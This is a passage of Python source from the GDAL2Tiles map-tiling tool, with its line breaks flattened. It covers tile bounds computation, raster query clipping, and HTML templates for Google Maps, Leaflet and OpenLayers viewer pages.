# Set the bounds tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz] ds = self.warped_input_dataset tilebands = self.dataBandsCount + 1 querysize = self.querysize if self.options.verbose: print("dataBandsCount: ", self.dataBandsCount) print("tilebands: ", tilebands) tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy)) ti = 0 tile_details = [] tz = self.tmaxz for ty in range(tmaxy, tminy - 1, -1): for tx in range(tminx, tmaxx + 1): ti += 1 tilefilename = os.path.join( self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext)) if self.options.verbose: print(ti, '/', tcount, tilefilename) if self.options.resume and os.path.exists(tilefilename): if self.options.verbose: print("Tile generation skipped because of --resume") continue # Create directories for the tile if not os.path.exists(os.path.dirname(tilefilename)): os.makedirs(os.path.dirname(tilefilename)) if self.options.profile == 'mercator': # Tile bounds in EPSG:3857 b = self.mercator.TileBounds(tx, ty, tz) elif self.options.profile == 'geodetic': b = self.geodetic.TileBounds(tx, ty, tz) # Don't scale up by nearest neighbour, better change the querysize # to the native resolution (and return smaller query tile) for scaling if self.options.profile in ('mercator', 'geodetic'): rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1]) # Pixel size in the raster covering query geo extent nativesize = wb[0] + wb[2] if self.options.verbose: print("\tNative Extent (querysize", nativesize, "): ", rb, wb) # Tile bounds in raster coordinates for ReadRaster query rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize) rx, ry, rxsize, rysize = rb wx, wy, wxsize, wysize = wb else: # 'raster' profile: tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels ysize = self.warped_input_dataset.RasterYSize if tz >= self.nativezoom: querysize = self.tile_size rx = (tx) * tsize rxsize = 0 if tx == tmaxx: rxsize = xsize % tsize if rxsize == 0: rxsize = tsize rysize = 0 if ty == tmaxy: rysize = ysize % tsize if rysize == 0: rysize = tsize ry = ysize - (ty * tsize) - rysize wx, wy = 0, 0 wxsize = int(rxsize / float(tsize) * self.tile_size) wysize = int(rysize / float(tsize) * self.tile_size) if wysize != self.tile_size: wy = self.tile_size - wysize # Read the source raster if anything is going inside the tile as per the computed # geo_query tile_details.append( TileDetail( tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx, wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize, ) ) conf = TileJobInfo( src_file=self.tmp_vrt_filename, nb_data_bands=self.dataBandsCount, output_file_path=self.output_folder, tile_extension=self.tileext, tile_driver=self.tiledriver, tile_size=self.tile_size, kml=self.kml, tminmax=self.tminmax, tminz=self.tminz, tmaxz=self.tmaxz, in_srs_wkt=self.in_srs_wkt, out_geo_trans=self.out_gt, ominy=self.ominy, is_epsg_4326=self.isepsg4326, options=self.options, exclude_transparent=self.options.exclude_transparent, ) return conf, tile_details def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0): """ For given dataset and query in cartographic coordinates returns parameters for ReadRaster() in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the extent is returned in the native resolution of dataset ds. raises Gdal2TilesError if the dataset does not contain anything inside this geo_query """ geotran = ds.GetGeoTransform() rx = int((ulx - geotran[0]) / geotran[1] + 0.001) ry = int((uly - geotran[3]) / geotran[5] + 0.001) rxsize = int((lrx - ulx) / geotran[1] + 0.5) rysize = int((lry - uly) / geotran[5] + 0.5) if not querysize: wxsize, wysize = rxsize, rysize else: wxsize, wysize = querysize, querysize # Coordinates should not go out of the bounds of the raster wx = 0 if rx < 0: rxshift = abs(rx) wx = int(wxsize * (float(rxshift) / rxsize)) wxsize = wxsize - wx rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize)) rx = 0 if rx + rxsize > ds.RasterXSize: wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize)) rxsize = ds.RasterXSize - rx wy = 0 if ry < 0: ryshift = abs(ry) wy = int(wysize * (float(ryshift) / rysize)) wysize = wysize - wy rysize = rysize - int(rysize * (float(ryshift) / rysize)) ry = 0 if ry + rysize > ds.RasterYSize: wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize)) rysize = ds.RasterYSize - ry return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize) def generate_tilemapresource(self): """ Template for tilemapresource.xml. Returns filled string. Expected variables: title, north, south, east, west, isepsg4326, projection, publishurl, zoompixels, tile_size, tileformat, profile """ args = {} args['title'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['profile'] = self.options.profile if self.options.profile == 'mercator': args['srs'] = "EPSG:3857" elif self.options.profile == 'geodetic': args['srs'] = "EPSG:4326" elif self.options.s_srs: args['srs'] = self.options.s_srs elif self.out_srs: args['srs'] = self.out_srs.ExportToWkt() else: args['srs'] = "" s = """<?xml version="1.0" encoding="utf-8"?> <TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0"> <Title>%(title)s</Title> <Abstract></Abstract> <SRS>%(srs)s</SRS> <BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/> <Origin x="%(west).14f" y="%(south).14f"/> <TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/> <TileSets profile="%(profile)s"> """ % args # noqa for z in range(self.tminz, self.tmaxz + 1): if self.options.profile == 'raster': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z) elif self.options.profile == 'mercator': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 156543.0339 / 2**z, z) elif self.options.profile == 'geodetic': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 0.703125 / 2**z, z) s += """ </TileSets> </TileMap> """ return s def generate_googlemaps(self): """ Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile. It returns filled string. Expected variables: title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title args['googlemapskey'] = self.options.googlekey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <title>%(title)s</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"/> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } </style> <script src='http://maps.google.com/maps?file=api&amp;v=2&amp;key=%(googlemapskey)s'></script> <script> //<![CDATA[ /* * Constants for given map * TODO: read it from tilemapresource.xml */ var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s)); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var opacity = 0.75; var map; var hybridOverlay; /* * Create a Custom Opacity GControl * http://www.maptiler.org/google-maps-overlay-opacity-control/ */ var CTransparencyLENGTH = 58; // maximum width that the knob can move (slide width minus knob width) function CTransparencyControl( overlay ) { this.overlay = overlay; this.opacity = overlay.getTileLayer().getOpacity(); } CTransparencyControl.prototype = new GControl(); // This function positions the slider to match the specified opacity CTransparencyControl.prototype.setSlider = function(pos) { var left = Math.round((CTransparencyLENGTH*pos)); this.slide.left = left; this.knob.style.left = left+"px"; this.knob.style.top = "0px"; } // This function reads the slider and sets the overlay opacity level CTransparencyControl.prototype.setOpacity = function() { // set the global variable opacity = this.slide.left/CTransparencyLENGTH; this.map.clearOverlays(); this.map.addOverlay(this.overlay, { zPriority: 0 }); if (this.map.getCurrentMapType() == G_HYBRID_MAP) { this.map.addOverlay(hybridOverlay); } } // This gets called by the API when addControl(new CTransparencyControl()) CTransparencyControl.prototype.initialize = function(map) { var that=this; this.map = map; // Is this MSIE, if so we need to use AlphaImageLoader var agent = navigator.userAgent.toLowerCase(); if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false} // create the background graphic as a <div> containing an image var container = document.createElement("div"); container.style.width="70px"; container.style.height="21px"; // Handle transparent PNG files in MSIE if (this.ie) { var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');"; container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>'; } else { container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>'; } // create the knob as a GDraggableObject // Handle transparent PNG files in MSIE if (this.ie) { var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');"; this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.overflow="hidden"; this.knob_img = document.createElement("div"); this.knob_img.style.height="21px"; this.knob_img.style.width="83px"; this.knob_img.style.filter=loader; this.knob_img.style.position="relative"; this.knob_img.style.left="-70px"; this.knob.appendChild(this.knob_img); } else { this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)"; this.knob.style.backgroundPosition="-70px 0px"; } container.appendChild(this.knob); this.slide=new GDraggableObject(this.knob, {container:container}); this.slide.setDraggableCursor('pointer'); this.slide.setDraggingCursor('pointer'); this.container = container; // attach the control to the map map.getContainer().appendChild(container); // init slider this.setSlider(this.opacity); // Listen for the slider being moved and set the opacity GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()}); //GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) }); return container; } // Set the default position for the control CTransparencyControl.prototype.getDefaultPosition = function() { return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47)); } /* * Full-screen Window Resize */ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if (document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; // map.checkResize(); } /* * Main load function: */ function load() { if (GBrowserIsCompatible()) { // Bug in the Google Maps: Copyright for Overlay is not correctly displayed var gcr = GMapType.prototype.getCopyrights; GMapType.prototype.getCopyrights = function(bounds,zoom) { return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom)); } map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } ); map.addMapType(G_PHYSICAL_MAP); map.setMapType(G_PHYSICAL_MAP); map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds )); hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] ); GEvent.addListener(map, "maptypechanged", function() { if (map.getCurrentMapType() == G_HYBRID_MAP) { map.addOverlay(hybridOverlay); } else { map.removeOverlay(hybridOverlay); } } ); var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom); var mercator = new GMercatorProjection(mapMaxZoom+1); tilelayer.getTileUrl = function(tile,zoom) { if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) { return "http://www.maptiler.org/img/none.png"; } var ymax = 1 << zoom; var y = ymax - tile.y -1; var tileBounds = new GLatLngBounds( mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ), mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom ) ); if (mapBounds.intersects(tileBounds)) { return zoom+"/"+tile.x+"/"+y+".png"; } else { return "http://www.maptiler.org/img/none.png"; } } // IE 7-: support for PNG alpha channel // Unfortunately, the opacity for whole overlay is then not changeable, either or... tilelayer.isPng = function() { return true;}; tilelayer.getOpacity = function() { return opacity; } overlay = new GTileLayerOverlay( tilelayer ); map.addOverlay(overlay); map.addControl(new GLargeMapControl()); map.addControl(new GHierarchicalMapTypeControl()); map.addControl(new CTransparencyControl( overlay )); """ % args # noqa if self.kml: s += """ map.addMapType(G_SATELLITE_3D_MAP); map.getEarthInstance(getEarthInstanceCB); """ s += """ map.enableContinuousZoom(); map.enableScrollWheelZoom(); map.setMapType(G_HYBRID_MAP); } resize(); } """ if self.kml: s += """ function getEarthInstanceCB(object) { var ge = object; if (ge) { var url = document.location.toString(); url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml'; var link = ge.createLink(""); if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") } else { link.setHref(url) }; var networkLink = ge.createNetworkLink(""); networkLink.setName("TMS Map Overlay"); networkLink.setFlyToView(true); networkLink.setLink(link); ge.getFeatures().appendChild(networkLink); } else { // alert("You should open a KML in Google Earth"); // add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML? } } """ % args # noqa s += """ onresize=function(){ resize(); }; //]]> </script> </head> <body onload="load()"> <div id="header"><h1>%(title)s</h1></div> <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU --> </div> <div id="map"></div> </body> </html> """ % args # noqa return s def generate_leaflet(self): """ Template for leaflet.html implementing overlay of tiles for 'mercator' profile. It returns filled string. Expected variables: title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title.replace('"', '\\"') args['htmltitle'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['centerlon'] = (args['north'] + args['south']) / 2. args['centerlat'] = (args['west'] + args['east']) / 2. args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['beginzoom'] = self.tmaxz args['tile_size'] = self.tile_size # not used args['tileformat'] = self.tileext args['publishurl'] = self.options.url # not used args['copyright'] = self.options.copyright.replace('"', '\\"') s = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' /> <title>%(htmltitle)s</title> <!-- Leaflet --> <link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" /> <script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script> <style> body { margin:0; padding:0; } body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; } #map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */ .ctl { padding: 2px 10px 2px 10px; background: white; background: rgba(255,255,255,0.9); box-shadow: 0 0 15px rgba(0,0,0,0.2); border-radius: 5px; text-align: right; } .title { font-size: 18pt; font-weight: bold; } .src { font-size: 10pt; } </style> </head> <body> <div id="map"></div> <script> /* **** Leaflet **** */ // Base layers // .. OpenStreetMap var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. CartoDB Positron var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, &copy; <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. OSM Toner var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. White background var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // Overlay layers (TMS) var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // Map var map = L.map('map', { center: [%(centerlon)s, %(centerlat)s], zoom: %(beginzoom)s, minZoom: %(minzoom)s, maxZoom: %(maxzoom)s, layers: [osm] }); var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white} var overlaymaps = {"Layer": lyr} // Title var title = L.control(); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl title'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = "%(title)s"; }; title.addTo(map); // Note var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>'; var title = L.control({position: 'bottomleft'}); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl src'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = src; }; title.addTo(map); // Add base layers L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map); // Fit to overlay bounds (SW and NE points with (lat, lon)) map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]); </script> </body> </html> """ % args # noqa return s def generate_openlayers(self): """ Template for openlayers.html implementing overlay of available Spherical Mercator layers. It returns filled string. Expected variables: title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title args['bingkey'] = self.options.bingkey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright if self.options.tmscompatible: args['tmsoffset'] = "-1" else: args['tmsoffset'] = "" if self.options.profile == 'raster': args['rasterzoomlevels'] = self.tmaxz + 1 args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1] s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" <head> <title>%(title)s</title> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } .olImageLoadError { display: none; } .olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; } </style>""" % args # noqa if self.options.profile == 'mercator': s += """ <script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script> """ % args s += """ <script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script> <script> var map; var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var emptyTileURL = "http://www.maptiler.org/img/none.png"; OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3; function init(){""" % args if self.options.profile == 'mercator': s += """ var options = { div: "map", controls: [], projection: "EPSG:3857", displayProjection: new OpenLayers.Projection("EPSG:4326"), numZoomLevels: 20 }; map = new OpenLayers.Map(options); // Create Google Mercator layers var gmap = new OpenLayers.Layer.Google("Google Streets", { type: google.maps.MapTypeId.ROADMAP, sphericalMercator: true }); var gsat = new OpenLayers.Layer.Google("Google Satellite", { type: google.maps.MapTypeId.SATELLITE, sphericalMercator: true }); var ghyb = new OpenLayers.Layer.Google("Google Hybrid", { type: google.maps.MapTypeId.HYBRID, sphericalMercator: true }); var gter = new OpenLayers.Layer.Google("Google Terrain", { type: google.maps.MapTypeId.TERRAIN, sphericalMercator: true }); // Create Bing layers var broad = new OpenLayers.Layer.Bing({ name: "Bing Roads", key: "%(bingkey)s", type: "Road", sphericalMercator: true }); var baer = new OpenLayers.Layer.Bing({ name: "Bing Aerial", key: "%(bingkey)s", type: "Aerial", sphericalMercator: true }); var bhyb = new OpenLayers.Layer.Bing({ name: "Bing Hybrid", key: "%(bingkey)s", type: "AerialWithLabels", sphericalMercator: true }); // Create OSM layer var osm = new OpenLayers.Layer.OSM("OpenStreetMap"); // create TMS Overlay layer var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([gmap, gsat, ghyb, gter, broad, baer, bhyb, osm, tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection)); """ % args # noqa elif self.options.profile == 'geodetic': s += """ var options = { div: "map", controls: [], projection: "EPSG:4326" }; map = new OpenLayers.Map(options); var wms = new OpenLayers.Layer.WMS("VMap0", "http://tilecache.osgeo.org/wms-c/Basic.py?", { layers: 'basic', format: 'image/png' } ); var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([wms,tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds); """ % args # noqa elif self.options.profile == 'raster': s += """ var options = { div: "map", controls: [], maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s), maxResolution: %(rastermaxresolution)f, numZoomLevels: %(rasterzoomlevels)d }; map = new OpenLayers.Map(options); var layer = new OpenLayers.Layer.TMS("TMS Layer", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', getURL: getURL }); map.addLayer(layer); map.zoomToExtent(mapBounds); """ % args # noqa s += """ map.addControls([new OpenLayers.Control.PanZoomBar(), new OpenLayers.Control.Navigation(), new OpenLayers.Control.MousePosition(), new OpenLayers.Control.ArgParser(), new OpenLayers.Control.Attribution()]); } """ % args if self.options.profile == 'mercator': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') { z+=1; } var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'geodetic': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom()%(tmsoffset)s; var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'raster': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa s += """ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if (document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; if (map.updateSize) { map.updateSize(); }; } onresize=function(){ resize(); }; </script> </head> <body onload="init()"> <div id="header"><h1>%(title)s</h1></div> <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU --> </div> <div id="map"></div> <script type="text/javascript" >resize()</script> </body> </html>""" % args # noqa return s def worker_tile_details(input_file, output_folder, options, send_pipe=None): try: gdal2tiles = GDAL2Tiles(input_file, output_folder, options) gdal2tiles.open_input() gdal2tiles.generate_metadata() tile_job_info, tile_details = gdal2tiles.generate_base_tiles() return_data = (tile_job_info, tile_details) if send_pipe: send_pipe.send(return_data) return return_data except Exception as e: print("worker_tile_details failed ", str(e)) def progress_printer_thread(queue, nb_jobs): pb = ProgressBar(nb_jobs) pb.start() for _ in range(nb_jobs): queue.get() pb.log_progress() queue.task_done() class ProgressBar(object): def __init__(self, total_items): self.total_items = total_items self.nb_items_done = 0 self.current_progress = 0 self.STEP = 2.5 def start(self): sys.stdout.write("0") def log_progress(self, nb_items=1): self.nb_items_done += nb_items progress = float(self.nb_items_done) / self.total_items * 100 if progress >= self.current_progress + self.STEP: done = False while not done: if self.current_progress + self.STEP <= progress: self.current_progress += self.STEP if self.current_progress % 10 == 0: sys.stdout.write(str(int(self.current_progress))) if self.current_progress == 100: sys.stdout.write("\n") else: sys.stdout.write(".") else: done = True sys.stdout.flush() def get_tile_swne(tile_job_info, options): if options.profile == 'mercator': mercator = GlobalMercator() tile_swne = mercator.TileLatLonBounds elif options.profile == 'geodetic': geodetic = GlobalGeodetic(options.tmscompatible) tile_swne = geodetic.TileLatLonBounds elif options.profile == 'raster': srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if tile_job_info.kml and tile_job_info.in_srs_wkt: in_srs = osr.SpatialReference() in_srs.ImportFromWkt(tile_job_info.in_srs_wkt) ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1]) west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex east = west + tile_job_info.tile_size * pixelsizex south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex north = south + tile_job_info.tile_size * pixelsizex if not tile_job_info.is_epsg_4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = 